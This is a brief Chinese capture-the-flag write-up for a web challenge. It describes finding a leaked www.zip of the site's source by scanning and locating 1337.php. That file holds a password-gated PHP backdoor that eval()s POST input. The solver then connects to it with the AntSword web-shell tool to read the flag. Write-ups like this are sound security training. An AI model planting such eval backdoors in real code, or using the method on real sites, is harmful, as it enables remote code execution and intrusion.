小蓝同学给你发来了他自己开发的网站链接,
他说他故意留下了一个压缩包文件,里面有网站的源代码,
他想考验一下你的网络安全技能。
(点击“下发赛题”后,你将得到一个http链接。如果该链接自动跳转到https,请手动将其改为http再进行访问。)
- 通过扫描工具扫出该网址下有www.zip文件,下载后查看其中的1337.php
<?php
# leet
if(md5($_GET['pwd'])=='217f81b8ff0a1ab138a8e1bdc031262e'){
eval($_POST['1337']);
}
可知MD5后的密文要等于’217f81b8ff0a1ab138a8e1bdc031262e’
输入密码,通过蚁剑进入SHELL
连接成功
进入根目录,找到flag
成功夺旗!
